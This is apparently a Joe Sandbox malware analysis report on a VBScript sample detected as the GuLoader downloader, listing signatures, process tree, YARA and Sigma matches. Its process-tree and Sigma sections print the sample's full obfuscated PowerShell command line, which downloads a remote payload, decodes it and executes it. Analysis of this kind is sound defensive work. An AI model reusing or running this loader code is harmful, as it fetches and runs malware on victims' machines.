Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Kostenvoranschlag.vbs

Overview

General Information

Sample name:Kostenvoranschlag.vbs
Analysis ID:1541205
MD5:080a163f1709fc1834429846644abf60
SHA1:998d9f5a1e0c00788d623cec753e34180135eb0c
SHA256:50a0b8b110c99e220f5872fc64fce72363511dcaae0a13a844537872ba349af3
Tags:vbsuser-lowmal3
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7260 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Kostenvoranschlag.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • PING.EXE (PID: 7336 cmdline: ping Horm5zl_6637.6637.6637.657e MD5: 2F46799D79D22AC72C241EC0322B011D)
      • conhost.exe (PID: 7344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7400 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Texguino Trave gastnderens Oppustes #>;$Nrtagenhedens='Forgrenedes';<#Samlemappens Slenderization Forepale Kiloers Bulmeurters #>;$Skuldrings11=$Varies+$host.UI; function Blaaklokkers($Kmnings246){If ($Skuldrings11) {$Koalabjrn++;}$Afvundnes=$Maleficium+$Kmnings246.'Length'-$Koalabjrn; for( $Katina=4;$Katina -lt $Afvundnes;$Katina+=5){$Tachytelic=$Katina;$Presartorial+=$Kmnings246[$Katina];$Harpalides='Glaeder';}$Presartorial;}function Fritidsklubberne($Fjernsynsapparat){ . ($Festsale) ($Fjernsynsapparat);}$Mellemstykket=Blaaklokkers 'C mpMUnaboRunbz.awaiComplAzuml RaaaWall/Amal ';$Arkipelagers='De d[ UncNP edEDaabtUn.e.Fjl.SNoncEMiljR Intv PiniE.toCSyllESyntPnervoLyriIafsyNOddet .olMK meaFavnnfra,A RungHabie KnorArga]Ingo:Kr g:AllesW.ipeBemacskftuBl,arSkovi CentUnlaY EstPObseRAriloMussTTrypOPaucCLageOTyp,lKerm Mist= Hy, ';$Mellemstykket+=Blaaklokkers 'Kors5Camb.P ls0Ande Paat( igiWRigsiSjusn InsdPolyo enrwMelosCykl endNOverT nd Gaar1Over0Atro.Mine0Unpr;Cha ,ikkW andiKancnrnne6Ro,e4Re r; K g Pr,xheim6Pawl4Feti; ora G ourCatavuneq:Peri1 Sem3Adve1 Pup.M,na0Aabe) Kli OveGPrd eWoolcSuppk PreoUni./Afma2Bane0 Fej1 ea0Skin0preo1,ros0Damp1Sand Ha FFlavi Sndr Ague DisfGorgoAbstx g n/Mari1 ave3 .al1Frem.gyna0Bes, ';$Arkipelagers+='Hold[StanNGroueA snTAbey.ProtS PrsEoprec inmU TwyrKretienertT anyRewrp SedrSleeoAylitGadeOProtCBaadoVeneLDepoTTtelY.ittpInteeToma] Sla ';$Furthy=Blaaklokkers 'InteU In sS edELunerM un-RemiaSpriGaikiEContN O eT rbe ';$Opvejningerne=Blaaklokkers ' ureh fsotBalltStabpStyls ati:Shet/Anno/,efowbejlw SubwFede.EpishHa doSt,nt OuteKloalOuabs ecie,usknBiseebefrcIndkaVarm. xplr Ai,oFasc/ MulPAv neFamirLyknsReprpStrieSnorcAnsatSnkeiVituv BesiUnu.s EcltHapu.RibbsWienn ybgpUni ';$Vellumy=Blaaklokkers 'Pseu>Adre ';$Festsale=Blaaklokkers 'tingiL rrEMediX,toc ';$Kua='Unfanged';$Arkipelagers+='thor:Unde:KdkrtPaloLRecosEnhe1S bs2 Hom ';$Befjelsernes='\Commandoes.Gre';Fritidsklubberne (Blaaklokkers 'Grav$Du,egTripL ndhoClosbTredARe aLSuff:DassBJuguA .eklOutlA Medr ,udaEli OKonk=vrne$WageeBurfnPr.tvSpri:F rsAshivPFi vpensodfi,aaDermTOtheaRega+ngle$,dspbgangE Ny f IltjGrenEReprL Ch s Fe ED varKnocNRegneL biS Irr ');Fritidsklubberne (Blaaklokkers ' Ci.$ torgSelvLB ddoFiloB indAKjruL Ko.:SucuS ,raaOv,rLLsenmKonceAitkdUdskIDoubg alt ermNBamlImruwN Fu GFormE elR.trasVrte=Rntg$shepOFe tpIlliv UbeEParajUnden AtoI OffnAbj gDespe LadrMononMissEAll . .erSfllePKanolR ali,almtKitt(nonb$BughV inE fr,L inylcageUUr sMVi.jyS nf)Regn ');Fritidsklubberne (Blaaklokkers $Arkipelagers);$Opvejningerne=$Salmedigtningers[0];$Autostandardization=(Blaaklokkers 'Moda$BobfgMuslLL viO omabAwarATes l for: .eisTvinnCommd Blae My rPoemlUn aeKmpem PranSndeiLokaNSt eGTrk,ESt iRDa enHundeBa f=UnheNRaasETeedWUn e-AdepO,edtb LuejSem.eSuppCSkrmtStil BesS PhoYClins Sint C.iEa epm Lyk. PernHar E ksiT A t. dewJgereImbuBLiviCPalelamini stvEBl gNUnaptTa.j ');Fritidsklubberne ($Autostandardization);Fritidsklubberne (Blaaklokkers ' kyd$CarpSHo knUmidd L meSemir Deml L.neM num salnK,lli Undn DemgIofbe NonrSpidnFalseIdio.Wat,HDr keCensaS bdd .sse HolrEtagsS bd[ Vig$ Su FHel uBogsrSuabtRusshUdspyDivi]Kidd= elv$ onoMRefoe BlulBe jlkompeNo dmcestsur tt HemyEverk.ffikAttreLatctRip ');$Miljbeskyttelseskonventioners=Blaaklokkers ',nsh$ O.uSUnden ahad .kaeF itrEnrelDem ePrefmTheanUdsairebunCapigCreme butrhyp.n OveePseu.LsniDSta o PoiwFrihnGhoullokko BlnaLystdKalvF UnbiCh llSickeresp( Kul$IganOTa pp,onev Je.eDolmjSpilnnighi CounAug.gElmueW,amrCas,nDueleSple,Wham$FirraArchn Ka.s YodtUudstKonge .arl .ersMeste NonsByfepZaptl egraMoonn I gsSc m)Ind ';$ansttelsesplans=$Balarao;Fritidsklubberne (Blaaklokkers 'Liba$ KonGT isL NonoJiv BKompA autLVest: arkpHemooOpers WebtBro IPol,L StaLAraeaEmueTUnmoiHeguOGyp NPorg= ig(Split eceEKvlnsDommtPaus-Fi uP MelASusstGadeh Sug P rv$Or hALageN,orsSDvrgtOnduTSheeEWreal Ba,S .taeMoolS Sh,PPsykLSestA RumN cars .um)Ocea ');while (!$Postillation) {Fritidsklubberne (Blaaklokkers 'D ou$FladgUd tlEf eoS ivbstera.lupl ra:P eeMPilie enorEntri EyetI.dio ncirCen iViolosejluPicksTranlquinyBar =Spec$FusetGrafrTek uScoleAlas ') ;Fritidsklubberne $Miljbeskyttelseskonventioners;Fritidsklubberne (Blaaklokkers 'P lySNotiTNeimaallerNaadTUfo,-r stsVandlCamoE V deOranpCard Fo s4Palm ');Fritidsklubberne (Blaaklokkers 'Plan$Stn gUlvel aloBissBl.dyAStanLVerd: ruPDehyOUn esDyscTSebriYvinlUniml BilAHeteT esti IsoOBlinn ep=Tril(Esclt Made EutsU.ictOmel-Ank pWhacaNilaTSkr hFrak lip$Bud ATroln rizsr veTFibrTChasEfrillUners.urgEc rcsFeofPInd LSekoA MilNTekss tto)ser ') ;Fritidsklubberne (Blaaklokkers 'Flan$StraGRentlDadeo ubbsmeraLat LDown:N nvYCo udAfgiE FodrMirslcarbiPl ugInvos pantOpsaESulfsChro=Ae.o$SciegforfLSheaOted bB deA KonlBars:N,agbComeiH drLTovrgSkylG ParEUdkar D snAf keMedl+Fre,+Konk% Kry$TestS SigaUllilUframT alEEcclD isiCorrg.arbT cepnSub iFjumN EdigIsopELophRSu csAsbe.MammCM llOSelvuP ovnBet,TCoug ') ;$Opvejningerne=$Salmedigtningers[$Yderligstes];}$Katinantergraft12=327303;$Klandret=29217;Fritidsklubberne (Blaaklokkers 'Sega$ di.gMalel layO MilbOrdrA.agel ei:F,rtI,jrnlOpd LInteaRootQTeoru,ille SkraStreb ,uaL tete,aar ,oss=Unde StegSt aE antopsl-VrdiC BalOSignnCeraTMesoESon NMa et .pr lec$ ForAButtN Trosbry,t MaeTKrakeTalllUmbrssal Eondus MarpSondLS prA KonNSkabSSubc ');Fritidsklubberne (Blaaklokkers ' sty$Anteg MuclWai.oInd,bMiniaSorel Ske:InteBMaalointrmMammbCa sy Re,cgul iFun.lObjel uteaHjer Pudd= ind East[Pho SOpsayC assSkartqurteTri.mfoto.FedtC MoooServntr.mv Co eDgnpr DmrtSwe ]B si:Fo s:S,rrFChadrMello Clom me.BVrgeaInspsTempeInfr6Data4ShebSProltKaemr.atriNonpnEfteg,ose(Bi o$rekoIMorgl O,fl PreaSp,nq Vrduf,ane SnoaE.spbAalelTe te Sko) kul ');Fritidsklubberne (Blaaklokkers ' e p$Epa gDepelpre,oFashBRnneaEspuLAspe:AlcafSem.iEnorrUncle A vSSem.IBgebdPresE,uri Mini= tri H mi[TyrksSlriY DumSInchtclogeShipM mrt.InteTForkEvarsx LogTS ua.Acrie onnN ,omC AstO OveDIntei hetNBiblGNote]Subp:Paal:SknjACounSAerocMisoIRi eiMe a.TilsgbjereoxidTMistS ChoTFu drKerai PronAm hGShri( je$WiseBPlatoRejimmultB ,teyTegnc,arsiKetaLG,nilLyriAM ho)Arta ');Fritidsklubberne (Blaaklokkers 'Sl e$KhmeGtolvL HanOViadbF.rfa esslSvin: onfpSymby dillFl,coUjvnr b.rO orlUMuttsFern6Stur9 Rai= C u$.panfBoerIM,rbr soleTo.ds erI alad odgeMark.MyelS keU C,tbTrensA ylTMosrr SteImodfN etrgAnti(Form$,arikDde AtreeTAteliinfanC,una VejN BeiTUopse C srDislGDimeRBl taPeleF ndtWhit1Trek2Prea,Vagt$ProcKUndrl GotABuseNhumed couRDr jEMasttPrer)Horr ');Fritidsklubberne $Pylorous69;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 8108 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Texguino Trave gastnderens Oppustes #>;$Nrtagenhedens='Forgrenedes';<#Samlemappens Slenderization Forepale Kiloers Bulmeurters #>;$Skuldrings11=$Varies+$host.UI; function Blaaklokkers($Kmnings246){If ($Skuldrings11) {$Koalabjrn++;}$Afvundnes=$Maleficium+$Kmnings246.'Length'-$Koalabjrn; for( $Katina=4;$Katina -lt $Afvundnes;$Katina+=5){$Tachytelic=$Katina;$Presartorial+=$Kmnings246[$Katina];$Harpalides='Glaeder';}$Presartorial;}function Fritidsklubberne($Fjernsynsapparat){ . ($Festsale) ($Fjernsynsapparat);}$Mellemstykket=Blaaklokkers 'C mpMUnaboRunbz.awaiComplAzuml RaaaWall/Amal ';$Arkipelagers='De d[ UncNP edEDaabtUn.e.Fjl.SNoncEMiljR Intv PiniE.toCSyllESyntPnervoLyriIafsyNOddet .olMK meaFavnnfra,A RungHabie KnorArga]Ingo:Kr g:AllesW.ipeBemacskftuBl,arSkovi CentUnlaY EstPObseRAriloMussTTrypOPaucCLageOTyp,lKerm Mist= Hy, ';$Mellemstykket+=Blaaklokkers 'Kors5Camb.P ls0Ande Paat( igiWRigsiSjusn InsdPolyo enrwMelosCykl endNOverT nd Gaar1Over0Atro.Mine0Unpr;Cha ,ikkW andiKancnrnne6Ro,e4Re r; K g Pr,xheim6Pawl4Feti; ora G ourCatavuneq:Peri1 Sem3Adve1 Pup.M,na0Aabe) Kli OveGPrd eWoolcSuppk PreoUni./Afma2Bane0 Fej1 ea0Skin0preo1,ros0Damp1Sand Ha FFlavi Sndr Ague DisfGorgoAbstx g n/Mari1 ave3 .al1Frem.gyna0Bes, ';$Arkipelagers+='Hold[StanNGroueA snTAbey.ProtS PrsEoprec inmU TwyrKretienertT anyRewrp SedrSleeoAylitGadeOProtCBaadoVeneLDepoTTtelY.ittpInteeToma] Sla ';$Furthy=Blaaklokkers 'InteU In sS edELunerM un-RemiaSpriGaikiEContN O eT rbe ';$Opvejningerne=Blaaklokkers ' ureh fsotBalltStabpStyls ati:Shet/Anno/,efowbejlw SubwFede.EpishHa doSt,nt OuteKloalOuabs ecie,usknBiseebefrcIndkaVarm. xplr Ai,oFasc/ MulPAv neFamirLyknsReprpStrieSnorcAnsatSnkeiVituv BesiUnu.s EcltHapu.RibbsWienn ybgpUni ';$Vellumy=Blaaklokkers 'Pseu>Adre ';$Festsale=Blaaklokkers 'tingiL rrEMediX,toc ';$Kua='Unfanged';$Arkipelagers+='thor:Unde:KdkrtPaloLRecosEnhe1S bs2 Hom ';$Befjelsernes='\Commandoes.Gre';Fritidsklubberne (Blaaklokkers 'Grav$Du,egTripL ndhoClosbTredARe aLSuff:DassBJuguA .eklOutlA Medr ,udaEli OKonk=vrne$WageeBurfnPr.tvSpri:F rsAshivPFi vpensodfi,aaDermTOtheaRega+ngle$,dspbgangE Ny f IltjGrenEReprL Ch s Fe ED varKnocNRegneL biS Irr ');Fritidsklubberne (Blaaklokkers ' Ci.$ torgSelvLB ddoFiloB indAKjruL Ko.:SucuS ,raaOv,rLLsenmKonceAitkdUdskIDoubg alt ermNBamlImruwN Fu GFormE elR.trasVrte=Rntg$shepOFe tpIlliv UbeEParajUnden AtoI OffnAbj gDespe LadrMononMissEAll . .erSfllePKanolR ali,almtKitt(nonb$BughV inE fr,L inylcageUUr sMVi.jyS nf)Regn ');Fritidsklubberne (Blaaklokkers $Arkipelagers);$Opvejningerne=$Salmedigtningers[0];$Autostandardization=(Blaaklokkers 'Moda$BobfgMuslLL viO omabAwarATes l for: .eisTvinnCommd Blae My rPoemlUn aeKmpem PranSndeiLokaNSt eGTrk,ESt iRDa enHundeBa f=UnheNRaasETeedWUn e-AdepO,edtb LuejSem.eSuppCSkrmtStil BesS PhoYClins Sint C.iEa epm Lyk. PernHar E ksiT A t. dewJgereImbuBLiviCPalelamini stvEBl gNUnaptTa.j ');Fritidsklubberne ($Autostandardization);Fritidsklubberne (Blaaklokkers ' kyd$CarpSHo knUmidd L meSemir Deml L.neM num salnK,lli Undn DemgIofbe NonrSpidnFalseIdio.Wat,HDr keCensaS bdd .sse HolrEtagsS bd[ Vig$ Su FHel uBogsrSuabtRusshUdspyDivi]Kidd= elv$ onoMRefoe BlulBe jlkompeNo dmcestsur tt HemyEverk.ffikAttreLatctRip ');$Miljbeskyttelseskonventioners=Blaaklokkers ',nsh$ O.uSUnden ahad .kaeF itrEnrelDem ePrefmTheanUdsairebunCapigCreme butrhyp.n OveePseu.LsniDSta o PoiwFrihnGhoullokko BlnaLystdKalvF UnbiCh llSickeresp( Kul$IganOTa pp,onev Je.eDolmjSpilnnighi CounAug.gElmueW,amrCas,nDueleSple,Wham$FirraArchn Ka.s YodtUudstKonge .arl .ersMeste NonsByfepZaptl egraMoonn I gsSc m)Ind ';$ansttelsesplans=$Balarao;Fritidsklubberne (Blaaklokkers 'Liba$ KonGT isL NonoJiv BKompA autLVest: arkpHemooOpers WebtBro IPol,L StaLAraeaEmueTUnmoiHeguOGyp NPorg= ig(Split eceEKvlnsDommtPaus-Fi uP MelASusstGadeh Sug P rv$Or hALageN,orsSDvrgtOnduTSheeEWreal Ba,S .taeMoolS Sh,PPsykLSestA RumN cars .um)Ocea ');while (!$Postillation) {Fritidsklubberne (Blaaklokkers 'D ou$FladgUd tlEf eoS ivbstera.lupl ra:P eeMPilie enorEntri EyetI.dio ncirCen iViolosejluPicksTranlquinyBar =Spec$FusetGrafrTek uScoleAlas ') ;Fritidsklubberne $Miljbeskyttelseskonventioners;Fritidsklubberne (Blaaklokkers 'P lySNotiTNeimaallerNaadTUfo,-r stsVandlCamoE V deOranpCard Fo s4Palm ');Fritidsklubberne (Blaaklokkers 'Plan$Stn gUlvel aloBissBl.dyAStanLVerd: ruPDehyOUn esDyscTSebriYvinlUniml BilAHeteT esti IsoOBlinn ep=Tril(Esclt Made EutsU.ictOmel-Ank pWhacaNilaTSkr hFrak lip$Bud ATroln rizsr veTFibrTChasEfrillUners.urgEc rcsFeofPInd LSekoA MilNTekss tto)ser ') ;Fritidsklubberne (Blaaklokkers 'Flan$StraGRentlDadeo ubbsmeraLat LDown:N nvYCo udAfgiE FodrMirslcarbiPl ugInvos pantOpsaESulfsChro=Ae.o$SciegforfLSheaOted bB deA KonlBars:N,agbComeiH drLTovrgSkylG ParEUdkar D snAf keMedl+Fre,+Konk% Kry$TestS SigaUllilUframT alEEcclD isiCorrg.arbT cepnSub iFjumN EdigIsopELophRSu csAsbe.MammCM llOSelvuP ovnBet,TCoug ') ;$Opvejningerne=$Salmedigtningers[$Yderligstes];}$Katinantergraft12=327303;$Klandret=29217;Fritidsklubberne (Blaaklokkers 'Sega$ di.gMalel layO MilbOrdrA.agel ei:F,rtI,jrnlOpd LInteaRootQTeoru,ille SkraStreb ,uaL tete,aar ,oss=Unde StegSt aE antopsl-VrdiC BalOSignnCeraTMesoESon NMa et .pr lec$ ForAButtN Trosbry,t MaeTKrakeTalllUmbrssal Eondus MarpSondLS prA KonNSkabSSubc ');Fritidsklubberne (Blaaklokkers ' sty$Anteg MuclWai.oInd,bMiniaSorel Ske:InteBMaalointrmMammbCa sy Re,cgul iFun.lObjel uteaHjer Pudd= ind East[Pho SOpsayC assSkartqurteTri.mfoto.FedtC MoooServntr.mv Co eDgnpr DmrtSwe ]B si:Fo s:S,rrFChadrMello Clom me.BVrgeaInspsTempeInfr6Data4ShebSProltKaemr.atriNonpnEfteg,ose(Bi o$rekoIMorgl O,fl PreaSp,nq Vrduf,ane SnoaE.spbAalelTe te Sko) kul ');Fritidsklubberne (Blaaklokkers ' e p$Epa gDepelpre,oFashBRnneaEspuLAspe:AlcafSem.iEnorrUncle A vSSem.IBgebdPresE,uri Mini= tri H mi[TyrksSlriY DumSInchtclogeShipM mrt.InteTForkEvarsx LogTS ua.Acrie onnN ,omC AstO OveDIntei hetNBiblGNote]Subp:Paal:SknjACounSAerocMisoIRi eiMe a.TilsgbjereoxidTMistS ChoTFu drKerai PronAm hGShri( je$WiseBPlatoRejimmultB ,teyTegnc,arsiKetaLG,nilLyriAM ho)Arta ');Fritidsklubberne (Blaaklokkers 'Sl e$KhmeGtolvL HanOViadbF.rfa esslSvin: onfpSymby dillFl,coUjvnr b.rO orlUMuttsFern6Stur9 Rai= C u$.panfBoerIM,rbr soleTo.ds erI alad odgeMark.MyelS keU C,tbTrensA ylTMosrr SteImodfN etrgAnti(Form$,arikDde AtreeTAteliinfanC,una VejN BeiTUopse C srDislGDimeRBl taPeleF ndtWhit1Trek2Prea,Vagt$ProcKUndrl GotABuseNhumed couRDr jEMasttPrer)Horr ');Fritidsklubberne $Pylorous69;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 8116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.2577384991.00000000088A0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    0000000D.00000002.2577528361.000000000A45F000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      0000000D.00000002.2561543050.0000000005A5D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
        00000004.00000002.1453020255.0000016773913000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
          Process Memory Space: powershell.exe PID: 7400JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Click to see the 3 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_7400.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi64_7400.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xfe22:$b2: ::FromBase64String(
              • 0xd1c3:$s1: -join
              • 0x696f:$s4: +=
              • 0x6a31:$s4: +=
              • 0xac58:$s4: +=
              • 0xcd75:$s4: +=
              • 0xd05f:$s4: +=
              • 0xd1a5:$s4: +=
              • 0xe9a3:$s4: +=
              • 0xea23:$s4: +=
              • 0xeae9:$s4: +=
              • 0xeb69:$s4: +=
              • 0xed3f:$s4: +=
              • 0xedc3:$s4: +=
              • 0xf5e1:$e4: Get-WmiObject
              • 0xf7d0:$e4: Get-Process
              • 0xf828:$e4: Start-Process
              amsi32_8108.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xe18d:$b2: ::FromBase64String(
              • 0xb60f:$s1: -join
              • 0x4dbb:$s4: +=
              • 0x4e7d:$s4: +=
              • 0x90a4:$s4: +=
              • 0xb1c1:$s4: +=
              • 0xb4ab:$s4: +=
              • 0xb5f1:$s4: +=
              • 0xcdef:$s4: +=
              • 0xce6f:$s4: +=
              • 0xcf35:$s4: +=
              • 0xcfb5:$s4: +=
              • 0xd18b:$s4: +=
              • 0xd20f:$s4: +=
              • 0xda2d:$e4: Get-WmiObject
              • 0xdc1c:$e4: Get-Process
              • 0xdc74:$e4: Start-Process
              • 0x15d99:$e4: Get-Process

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Kostenvoranschlag.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Kostenvoranschlag.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Kostenvoranschlag.vbs", ProcessId: 7260, ProcessName: wscript.exe
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Kostenvoranschlag.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Kostenvoranschlag.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Kostenvoranschlag.vbs", ProcessId: 7260, ProcessName: wscript.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Texguino Trave gastnderens Oppustes #>;$Nrtagenhedens='Forgrenedes';<#Samlemappens Slenderization Forepale Kiloers Bulmeurters #>;$Skuldrings11=$Varies+$host.UI; function Blaaklokkers($Kmnings246){If ($Skuldrings11) {$Koalabjrn++;}$Afvundnes=$Maleficium+$Kmnings246.'Length'-$Koalabjrn; for( $Katina=4;$Katina -lt $Afvundnes;$Katina+=5){$Tachytelic=$Katina;$Presartorial+=$Kmnings246[$Katina];$Harpalides='Glaeder';}$Presartorial;}function Fritidsklubberne($Fjernsynsapparat){ . ($Festsale) ($Fjernsynsapparat);}$Mellemstykket=Blaaklokkers 'C mpMUnaboRunbz.awaiComplAzuml RaaaWall/Amal ';$Arkipelagers='De d[ UncNP edEDaabtUn.e.Fjl.SNoncEMiljR Intv PiniE.toCSyllESyntPnervoLyriIafsyNOddet .olMK meaFavnnfra,A RungHabie KnorArga]Ingo:Kr g:AllesW.ipeBemacskftuBl,arSkovi CentUnlaY EstPObseRAriloMussTTrypOPaucCLageOTyp,lKerm Mist= Hy, ';$Mellemstykket+=Blaaklokkers 'Kors5Camb.P ls0Ande Paat( igiWRigsiSjusn InsdPolyo enrwMelosCykl endNOverT nd Gaar1Over0Atro.Mine0Unpr;Cha ,ikkW andiKancnrnne6Ro,e4Re r; K g Pr,xheim6Pawl4Feti; ora G ourCatavuneq:Peri1 Sem3Adve1 Pup.M,na0Aabe) Kli OveGPrd eWoolcSuppk PreoUni./Afma2Bane0 Fej1 ea0Skin0preo1,ros0Damp1Sand Ha FFlavi Sndr Ague DisfGorgoAbstx g n/Mari1 ave3 .al1Frem.gyna0Bes, ';$Arkipelagers+='Hold[StanNGroueA snTAbey.ProtS PrsEoprec inmU TwyrKretienertT anyRewrp SedrSleeoAylitGadeOProtCBaadoVeneLDepoTTtelY.ittpInteeToma] Sla ';$Furthy=Blaaklokkers 'InteU In sS edELunerM un-RemiaSpriGaikiEContN O eT rbe ';$Opvejningerne=Blaaklokkers ' ureh fsotBalltStabpStyls ati:Shet/Anno/,efowbejlw SubwFede.EpishHa doSt,nt OuteKloalOuabs ecie,usknBiseebefrcIndkaVarm. xplr Ai,oFasc/ MulPAv neFamirLyknsReprpStrieSnorcAnsatSnkeiVituv BesiUnu.s EcltHapu.RibbsWienn ybgpUni ';$Vellumy=Blaaklokkers 'Pseu>Adre ';$Festsale=Blaaklokkers 'tingiL rrEMediX,toc ';$Kua='Unfanged';$Arkipelagers+='thor:Unde:KdkrtPaloLRecosEnhe1S bs2 Hom ';$Befjelsernes='\Commandoes.Gre';Fritidsklubberne (Blaaklokkers 'Grav$Du,egTripL ndhoClosbTredARe aLSuff:DassBJuguA .eklOutlA Medr ,udaEli OKonk=vrne$WageeBurfnPr.tvSpri:F rsAshivPFi vpensodfi,aaDermTOtheaRega+ngle$,dspbgangE Ny f IltjGrenEReprL Ch s Fe ED varKnocNRegneL biS Irr ');Fritidsklubberne (Blaaklokkers ' Ci.$ torgSelvLB ddoFiloB indAKjruL Ko.:SucuS ,raaOv,rLLsenmKonceAitkdUdskIDoubg alt ermNBamlImruwN Fu GFormE elR.trasVrte=Rntg$shepOFe tpIlliv UbeEParajUnden AtoI OffnAbj gDespe LadrMononMissEAll . .erSfllePKanolR ali,almtKitt(nonb$BughV inE fr,L inylcageUUr sMVi.jyS nf)Regn ');Fritidsklubberne (Blaaklokkers $Arkipelagers);$Opvejningerne=$Salmedigtningers[0];$Autostandardization=(Blaaklokkers 'Moda$BobfgMuslLL viO omabAwarATes l for: .eisTvinnCommd Blae My rPoemlUn aeKmpem PranSndeiLokaNSt eGTrk,ESt iRDa enHundeBa f=UnheNRaasETeedWUn e-AdepO,edtb LuejSem.eSuppCSkrmtStil BesS PhoYClins Sint C.iEa epm Lyk. PernHar E ksiT A t. dewJgereImbuBLiviCPalelamini stvEBl gNUnaptTa.j ');Fritidsklubberne ($Autostandardization);Fritidsklubbern

              Suricata Signatures

              No Suricata rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 95.6% probability
              Source: unknownHTTPS traffic detected: 185.181.240.15:443 -> 192.168.2.7:49700 version: TLS 1.2
              Source: Binary string: *on.pdb source: powershell.exe, 00000004.00000002.1460713089.000001677BC95000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: tem.Core.pdbz' source: powershell.exe, 0000000D.00000002.2539499175.0000000002D7F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: tomation.pdbGk source: powershell.exe, 00000004.00000002.1460713089.000001677BC95000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Suspicious execution chain found
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              barindex
              Uses ping.exe to check the status of other devices and networks
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping Horm5zl_6637.6637.6637.657e
